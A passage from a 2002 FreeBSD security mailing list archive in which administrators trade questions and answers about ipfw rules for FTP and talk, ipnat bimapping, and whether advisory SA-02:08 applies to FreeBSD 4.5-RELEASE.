Eric -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology You have my continuous partial attention ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 9: 0:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from vortex.wa4phy.net (pcp01578187pcs.martnz01.ga.comcast.net [68.47.5.16]) by hub.freebsd.org (Postfix) with ESMTP id A2A6737B40B for ; Thu, 9 May 2002 09:00:07 -0700 (PDT) Received: from vortex.wa4phy.net (localhost.wa4phy.net [127.0.0.1]) by vortex.wa4phy.net (8.11.6/8.11.6) with ESMTP id g49G06i05081 for ; Thu, 9 May 2002 12:00:06 -0400 (EDT) (envelope-from sam@wa4phy.net) Message-ID: <3CDA9D06.3ABEBDEE@vortex.wa4phy.net> Date: Thu, 09 May 2002 12:00:06 -0400 
From: Sam Drinkard Organization: You Gotta Be Kiddin! X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.5-STABLE i386) X-Accept-Language: en, ja MIME-Version: 1.0 To: security@freebsd.org Subject: Talk Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm stuck again, but making progress! Trying to get talk to work again, and having some trouble determining what kind of rule to use to permit it to work once a party has logged in. I'm seeing a connection request via sockstat on tcp ports 1075-1083 or so, and udp ports in the 2500 range. My rule (that doesn't work) : allow tcp from 127.0.0.1 1025-1087 to any allow udp from 127.0.0.1 2500-2600 to any Am I all wet on my thinking here, or is something else I'm missing? Thanks.. Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 9:28:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by hub.freebsd.org (Postfix) with ESMTP id 0888237B40D for ; Thu, 9 May 2002 09:28:32 -0700 (PDT) Received: from bmah.dyndns.org ([12.233.149.189]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020509162826.VCYY25294.rwcrmhc52.attbi.com@bmah.dyndns.org>; Thu, 9 May 2002 16:28:26 +0000 Received: from intruder.bmah.org (localhost [IPv6:::1]) by bmah.dyndns.org (8.12.3/8.12.3) with ESMTP id g49GSKL8041779; Thu, 9 May 2002 09:28:20 -0700 (PDT) (envelope-from bmah@intruder.bmah.org) Received: (from bmah@localhost) by intruder.bmah.org (8.12.3/8.12.3/Submit) id g49GSGKG041778; Thu, 9 May 2002 09:28:16 -0700 (PDT) Message-Id: <200205091628.g49GSGKG041778@intruder.bmah.org> X-Mailer: exmh version 2.5+ 20020506 with nmh-1.0.4 To: 
"[brano]" Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD-SA-02:08 In-reply-to: <064601c1f68f$ae8e4480$c28c630a@bb.ubp.sk> References: <3CD8558E.2FA68C36@lumeta.com> <064601c1f68f$ae8e4480$c28c630a@bb.ubp.sk> Comments: In-reply-to "[brano]" message dated "Wed, 08 May 2002 14:55:47 +0200." From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 09 May 2002 09:28:16 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If memory serves me right, "[brano]" wrote: > I have FreeBSD 4.5-RELEASE and i compile my own kernel. I need to apply > patch FreeBSD-SA-02:08 ? > I'm look at file src/sys/conf/newvers.sh which have: > # $FreeBSD: src/sys/conf/newvers.sh,v 1.44.2.20.2.1 2002/01/28 06:42:16 > murray Exp $ > and in patch file is write 1.44.2.17.2.5 Revision > then I need apply this patch ? No need. If you look in the release notes that come with FreeBSD 4.5-RELEASE, you'll see that it already includes the fix for FreeBSD-SA-02:08. Good luck, Bruce. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 9:38:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id 2DFCE37B400 for ; Thu, 9 May 2002 09:38:08 -0700 (PDT) Received: from daleco [12.145.226.171] by mail.gbronline.com (SMTPD32-7.06) id A5A23E1A0206; Thu, 09 May 2002 11:36:50 -0500 Message-ID: <00c101c1f777$ce855ce0$abe2910c@daleco> 
From: "Kevin Kinsey, DaleCo, S.P." To: Cc: References: <3CD8558E.2FA68C36@lumeta.com> <064601c1f68f$ae8e4480$c28c630a@bb.ubp.sk> <200205091628.g49GSGKG041778@intruder.bmah.org> Subject: Re: FreeBSD-SA-02:08 Date: Thu, 9 May 2002 11:37:26 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- 
From: "Bruce A. Mah" To: "[brano]" Cc: Sent: Thursday, May 09, 2002 11:28 AM Subject: Re: FreeBSD-SA-02:08 > If memory serves me right, "[brano]" wrote: > > > I have FreeBSD 4.5-RELEASE and i compile my own kernel. I need to apply > > patch FreeBSD-SA-02:08 ? > > I'm look at file src/sys/conf/newvers.sh which have: > > # $FreeBSD: src/sys/conf/newvers.sh,v 1.44.2.20.2.1 2002/01/28 06:42:16 > > murray Exp $ > > and in patch file is write 1.44.2.17.2.5 Revision > > then I need apply this patch ? > > No need. > > If you look in the release notes that come with FreeBSD 4.5-RELEASE, > you'll see that it already includes the fix for FreeBSD-SA-02:08. > > Good luck, > > Bruce. > However, there have been about 6 core issues since 4.5 Release. Look at SA-02:13, SA-02:18, SA-02:20-23.... A number of folks have mentioned possible successful attacks via the stdio exploit. Kevin Kinsey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 10: 1: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 5584B37B414 for ; Thu, 9 May 2002 10:00:45 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) 
From: "Nielsen" To: References: <3CDA988D.34E2148C@centtech.com> Subject: Re: ipnat and bimapping MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020509170045.5584B37B414@hub.freebsd.org> Date: Thu, 9 May 2002 10:00:45 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Works for me. The two ranges also don't overlap. In my experience, however, even if they do ipnat is smart enough to handle certain overlapping subnets properly. I think last rule wins. ----- Original Message ----- > Would bimap'ing the 24.24.24.1/32 address to 10.10.20.2/32 work? Or would that > screw up my nat'ing of the 10.10.10.0/24 net? I need all ports NOT nat'ed to > 10.10.10.0/24 to go to 10.10.20.2/32. Am I asking for trouble on the protected > net, or is this safe? Is bimap the right thing to use? > > How big is the gun that I am about to use to shoot myself in the foot? > > Eric To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 10:48:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from blacklamb.mykitchentable.net (ekgr-dsl2-92.citlink.net [207.173.226.92]) by hub.freebsd.org (Postfix) with ESMTP id 397D437B40C for ; Thu, 9 May 2002 10:48:25 -0700 (PDT) Received: from tagalong (unknown [165.107.42.110]) by blacklamb.mykitchentable.net (Postfix) with SMTP id 3D4F5EE644 for ; Thu, 9 May 2002 10:48:24 -0700 (PDT) Message-ID: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> 
From: "Drew Tomlinson" To: Subject: Allowing FTP Through *My* IPFW Firewall Date: Thu, 9 May 2002 10:48:23 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I'm trying to figure out what rule I need to add or change to allow ftp sessions to pass through my ipfw firewall. I have searched the archives but the only conclusions I have found is that this is a difficult task because of the nature of ftp. I'm hoping someone can help me with my specific situation.

Here is how my home network is configured:

ISP
|
| Public DHCP address
|
3Com ADSL Modem/Router
(Router performs NAT and passes packets to 10.2 by default)
| (192.168.10.1)
|
|
| (ed1 192.168.10.2)
FBSD Gateway
| (ed0 192.168.1.2)
|
|
Internal LAN

These are my current firewall rules:

blacksheep# ipfw list
00100 allow ip from any to any via lo0
00200 deny log ip from any to 127.0.0.0/8
00300 deny log ip from 192.168.1.0/24 to any in recv ed1
00400 deny log ip from not 192.168.1.0/24 to any in recv ed0
00500 check-state
00600 allow tcp from 192.168.1.0/24 21,22,25,80,143,389,443,993,5405,10001 to any established
00700 allow tcp from any to 192.168.1.0/24 21,22,25,80,143,389,443,993,5405,10001
00800 allow tcp from 192.168.10.2 to any 21,22,8021 established
00900 allow tcp from any to 192.168.10.2 21,22,8021
01000 allow icmp from any to any icmptype 3,4,11,12
01100 allow icmp from any to any out icmptype 8
01200 allow icmp from any to any in icmptype 0
01300 reset log tcp from any to any 113
01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123
01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123
01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123
01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123
01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123
01900 allow udp from 192.168.10.1 to any
02000 allow udp from any to 192.168.10.1
02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1
02200 allow ip from 192.168.1.0/24 to any keep-state via ed0
65500 deny log ip from any to any

An FTP client on the outside can establish a session and login through the firewall but fails when the first data transfer (listing the remote directory) begins. Here is a sample entry from my security log:

May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP 207.173.226.108:2191 192.168.1.4:49172 in via ed1

Any help would be appreciated.

Thanks,

Drew

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 9 12:58:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id ACCA137B400 for ; Thu, 9 May 2002 12:58:21 -0700 (PDT) Received: (qmail 25164 invoked from network); 9 May 2002 19:58:10 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 9 May 2002 19:58:10 -0000 Content-Type: text/plain; charset="iso-8859-1"
From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: "Drew Tomlinson" Subject: Re: Allowing FTP Through *My* IPFW Firewall Date: Thu, 9 May 2002 13:53:55 -0600 X-Mailer: KMail [version 1.4] References: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> In-Reply-To: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205091353.55767.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On May 9, 2002 11:48 am, Drew Tomlinson wrote:

Well this isn't really security related... Anyway... Make sure your 1st router (I might be unclear here.. You say that you have a NAT right after the 3com box) can port forward ports 21,49152-65535 to your FreeBSD box.

Then add the following ipfw rules to your /etc/rc.firewall file just below the "allow tcp from any to any established" and "allow ip from any to any frag" lines:

${fwcmd} add allow tcp from any to ${ip} 21 setup
${fwcmd} add allow tcp from any to ${ip} 49152-65535

Then start up ftpd...
"/usr/libexec/ftpd -D -a 192.168.10.2"

That should do it.. it works for me..

I hope this helps. :)

> I'm trying to figure out what rule I need to add or change to allow ftp
> sessions to pass through my ipfw firewall. I have searched the archives
> but the only conclusions I have found is that this is a difficult task
> because of the nature of ftp. I'm hoping someone can help me with my
> specific situation.
> > Here is how my home network is configured: > > ISP > > | Public DHCP address > > 3Com ADSL Modem/Router > (Router performs NAT and passes packets to 10.2 by default) > > | (192.168.10.1) > | > | > | (ed1 192.168.10.2) > > FBSD Gateway > > | (ed0 192.168.1.2) > > Internal LAN > > > These are my current firewall rules: > > blacksheep# ipfw list > 00100 allow ip from any to any via lo0 > 00200 deny log ip from any to 127.0.0.0/8 > 00300 deny log ip from 192.168.1.0/24 to any in recv ed1 > 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0 > 00500 check-state > 00600 allow tcp from 192.168.1.0/24 > 21,22,25,80,143,389,443,993,5405,10001 to any established > 00700 allow tcp from any to 192.168.1.0/24 > 21,22,25,80,143,389,443,993,5405,10001 > 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established > 00900 allow tcp from any to 192.168.10.2 21,22,8021 > 01000 allow icmp from any to any icmptype 3,4,11,12 > 01100 allow icmp from any to any out icmptype 8 > 01200 allow icmp from any to any in icmptype 0 > 01300 reset log tcp from any to any 113 > 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123 > 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123 > 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123 > 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123 > 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123 > 01900 allow udp from 192.168.10.1 to any > 02000 allow udp from any to 192.168.10.1 > 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1 > 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0 > 65500 deny log ip from any to any > > An FTP client on the outside can establish as session and login through > the firewall but fails when the first data transfer (listing the remote > directory) begins. Here is a sample entry from my security log: > > May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP > 207.173.226.108:2191 192.168.1.4:49172 in via ed1 > > Any help would be appreciated. 
> > Thanks, > > Drew > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 13:15:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (dav64.law15.hotmail.com [64.4.22.199]) by hub.freebsd.org (Postfix) with ESMTP id 04B8237B40B; Thu, 9 May 2002 13:15:14 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 9 May 2002 13:15:10 -0700 X-Originating-IP: [62.0.106.98] 
From: "Naughty Taz" To: Cc: Subject: IPFW and IP/mask mathematics Date: Thu, 9 May 2002 23:14:13 +0200 Message-ID: <001e01c1f79e$78612390$626a003e@homepc> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-OriginalArrivalTime: 09 May 2002 20:15:10.0262 (UTC) FILETIME=[382B9560:01C1F796] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I've been trying to get a ruleset for IPFW but was unable to figure out how to do it :( I'd appreciate it if someone can reply with the right ruleset for the following: 1) allow traffic from 0.0.0.0 - XXX.128.0.0 2) block traffic from XXX.128.0.0 - XXX.146.159.255 3) allow traffic from XXX.146.160.0 - 255.255.255.255 Thanks in advance. /Taz P.S.: IP's are imaginary of course. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 13:26:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f253.law14.hotmail.com [64.4.20.128]) by hub.freebsd.org (Postfix) with ESMTP id A97E537B407 for ; Thu, 9 May 2002 13:26:19 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 9 May 2002 13:26:19 -0700 Received: from 209.124.223.126 by lw14fd.law14.hotmail.msn.com with HTTP; Thu, 09 May 2002 20:26:18 GMT X-Originating-IP: [209.124.223.126] 
From: "William J. Borskey" To: amannetsec@hotmail.com, security@freebsd.org Subject: Re: ethernet firewall Date: Thu, 09 May 2002 13:26:18 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 09 May 2002 20:26:19.0580 (UTC) FILETIME=[C71D67C0:01C1F797] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org yea i want to allow ssh from the world to my machine (i have done this using ipfw). and i also want allow netbios from one mac address on my local net. so i should write a rule for it in both? _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 14:56:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from selenite.tzc.com (selenite.tzc.com [204.209.140.47]) by hub.freebsd.org (Postfix) with SMTP id 6AB6637B400 for ; Thu, 9 May 2002 14:56:34 -0700 (PDT) Received: (qmail 53178 invoked from network); 9 May 2002 21:56:28 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 9 May 2002 21:56:28 -0000 Content-Type: text/plain; charset="iso-8859-1" 
From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: "Diego SOSA" Subject: Re: Allowing FTP Through *My* IPFW Firewall Date: Thu, 9 May 2002 15:52:13 -0600 X-Mailer: KMail [version 1.4] References: In-Reply-To: Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205091552.13701.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On May 9, 2002 02:09 pm, you wrote:

That will not work, you need to let the ftp-data connections through... your ruleset is for port 21 only.

> Hi, I speaking Spanish
>
> probe:
>
> ipfw add 64444 allow tcp from any to any ftp
>
>
> Sld,
> D
>
> >>> "Dalin S. Owen" 09/05/2002 04:53:55 >>>
>
> On May 9, 2002 11:48 am, Drew Tomlinson wrote:
>
> Well this isn't really security related... Anyway... Make sure your 1st
> router (I might be unclear here.. You say that you have a NAT right after
> the 3com box) can port forward ports 21,49152-65535 to your FreeBSD box.
>
> Then add the following ipfw rules to your /etc/rc.firewall file just below
> the "allow tcp from any to any established" and "allow ip from any to any
> frag" lines:
>
> ${fwcmd} add allow tcp from any to ${ip} 21 setup
> ${fwcmd} add allow tcp from any to ${ip} 49152-65535
>
> Then start up ftpd...
> "/usr/libexec/ftpd -D -a 192.168.10.2"
>
> That should do it.. it works for me..
>
> I hope this helps. :)
>
> > I'm trying to figure out what rule I need to add or change to allow ftp
> > sessions to pass through my ipfw firewall. I have searched the archives
> > but the only conclusions I have found is that this is a difficult task
> > because of the nature of ftp. I'm hoping someone can help me with my
> > specific situation.
> >
> > Here is how my home network is configured:
> >
> > ISP
> >
> > | Public DHCP address
> >
> > 3Com ADSL Modem/Router
> > (Router performs NAT and passes packets to 10.2 by default)
> >
> > | (192.168.10.1)
> > |
> > |
> > | (ed1 192.168.10.2)
> >
> > FBSD Gateway
> >
> > | (ed0 192.168.1.2)
> >
> > Internal LAN
> >
> >
> > These are my current firewall rules:
> >
> > blacksheep# ipfw list
> > 00100 allow ip from any to any via lo0
> > 00200 deny log ip from any to 127.0.0.0/8
> > 00300 deny log ip from 192.168.1.0/24 to any in recv ed1
> > 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0
> > 00500 check-state
> > 00600 allow tcp from 192.168.1.0/24
> > 21,22,25,80,143,389,443,993,5405,10001 to any established
> > 00700 allow tcp from any to 192.168.1.0/24
> > 21,22,25,80,143,389,443,993,5405,10001
> > 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established
> > 00900 allow tcp from any to 192.168.10.2 21,22,8021
> > 01000 allow icmp from any to any icmptype 3,4,11,12
> > 01100 allow icmp from any to any out icmptype 8
> > 01200 allow icmp from any to any in icmptype 0
> > 01300 reset log tcp from any to any 113
> > 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123
> > 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123
> > 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123
> > 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123
> > 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123
> > 01900 allow udp from 192.168.10.1 to any
> > 02000 allow udp from any to 192.168.10.1
> > 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1
> > 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0
> > 65500 deny log ip from any to any
> >
> > An FTP client on the outside can establish a session and login through
> > the firewall but fails when the first data transfer (listing the remote
> > directory) begins.
Here is a sample entry from my security log: > > > > May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP > > 207.173.226.108:2191 192.168.1.4:49172 in via ed1 > > > > Any help would be appreciated. > > > > Thanks, > > > > Drew > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 15: 1:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 7909A37B409 for ; Thu, 9 May 2002 15:01:29 -0700 (PDT) Received: (qmail 27156 invoked from network); 9 May 2002 22:01:28 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 9 May 2002 22:01:28 -0000 Content-Type: text/plain; charset="iso-8859-1" 
From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: "Naughty Taz" Subject: Re: IPFW and IP/mask mathematics Date: Thu, 9 May 2002 15:57:13 -0600 X-Mailer: KMail [version 1.4] References: <001e01c1f79e$78612390$626a003e@homepc> In-Reply-To: <001e01c1f79e$78612390$626a003e@homepc> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205091557.13783.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

What kind of "traffic", I will assume you want to block "all" (tcp/udp/icmp/esp/ah/look in /etc/protocols for a list)....

/sbin/ipfw add allow all from 0.0.0.0 to XXX.128.0.0
/sbin/ipfw add deny all from XXX.128.0.0 to XXX.146.159.255
/sbin/ipfw add allow all from XXX.146.160.0 to 255.255.255.255

There ya go.. :)

On May 9, 2002 03:14 pm, Naughty Taz wrote:
> Hi all,
>
> I've been trying to get a ruleset for IPFW but was unable to figure out
> how to do it :(
> I'd appreciate it if someone can reply with the right ruleset for the
> following:
>
> 1) allow traffic from 0.0.0.0 - XXX.128.0.0
> 2) block traffic from XXX.128.0.0 - XXX.146.159.255
> 3) allow traffic from XXX.146.160.0 - 255.255.255.255
>
> Thanks in advance.
>
> /Taz
>
> P.S.: IP's are imaginary of course.
> > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 15:13:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (dav30.law15.hotmail.com [64.4.22.87]) by hub.freebsd.org (Postfix) with ESMTP id 70FA037B49F for ; Thu, 9 May 2002 15:12:49 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 9 May 2002 15:12:49 -0700 X-Originating-IP: [62.0.106.98] From: "Naughty Taz" To: Cc: Subject: RE: IPFW and IP/mask mathematics Date: Fri, 10 May 2002 01:11:51 +0200 Message-ID: <004d01c1f7ae$e752ad90$626a003e@homepc> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <200205091557.13783.dowen@pstis.com> X-OriginalArrivalTime: 09 May 2002 22:12:49.0297 (UTC) FILETIME=[A7AED810:01C1F7A6] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hehehehe :) That was not my intention of course. Observe: 1) allow traffic from ANY to IP's in the range (0.0.0.0 - XXX.128.0.0) 2) block traffic from ANY to IP's in the range (XXX.128.0.0 - XXX.146.159.255) 3) allow traffic from ANY to IP's in the range (XXX.146.160.0 - 255.255.255.255) Is it more clear now? /Taz -----Original Message----- 
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Dalin S. Owen Sent: ? 09 ??? 2002 23:57 To: Naughty Taz Cc: security@freebsd.org Subject: Re: IPFW and IP/mask mathematics

What kind of "traffic", I will assume you want to block "all" (tcp/udp/icmp/esp/ah/look in /etc/protocols for a list)....

/sbin/ipfw add allow all from 0.0.0.0 to XXX.128.0.0
/sbin/ipfw add deny all from XXX.128.0.0 to XXX.146.159.255
/sbin/ipfw add allow all from XXX.146.160.0 to 255.255.255.255

There ya go.. :)

On May 9, 2002 03:14 pm, Naughty Taz wrote:
> Hi all,
>
> I've been trying to get a ruleset for IPFW but was unable to figure out
> how to do it :(
> I'd appreciate it if someone can reply with the right ruleset for the
> following:
>
> 1) allow traffic from 0.0.0.0 - XXX.128.0.0
> 2) block traffic from XXX.128.0.0 - XXX.146.159.255
> 3) allow traffic from XXX.146.160.0 - 255.255.255.255
>
> Thanks in advance.
>
> /Taz
>
> P.S.: IP's are imaginary of course.
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 9 15:44: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from leaf.lumiere.net (leaf.lumiere.net [208.44.192.100]) by hub.freebsd.org (Postfix) with ESMTP id 2E45737B413 for ; Thu, 9 May 2002 15:43:46 -0700 (PDT) Received: by leaf.lumiere.net (Postfix, from userid 1082) id 067C0CD36; Thu, 9 May 2002 15:43:41 -0700 (PDT) Date: Thu, 9 May 2002 15:43:40 -0700
From: Derrick John Klise To: Naughty Taz Cc: security@freebsd.org Subject: Re: IPFW and IP/mask mathematics Message-ID: <20020509154340.A8964@leaf.lumiere.net> References: <200205091557.13783.dowen@pstis.com> <004d01c1f7ae$e752ad90$626a003e@homepc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <004d01c1f7ae$e752ad90$626a003e@homepc>; from naughty_taz@hotmail.com on Fri, May 10, 2002 at 01:11:51AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, May 10, 2002 at 01:11:51AM +0200, Naughty Taz wrote: > Hehehehe :) > > That was not my intention of course. Observe: > > 1) allow traffic from ANY to IP's in the range (0.0.0.0 - XXX.128.0.0) > 2) block traffic from ANY to IP's in the range (XXX.128.0.0 - > XXX.146.159.255) > 3) 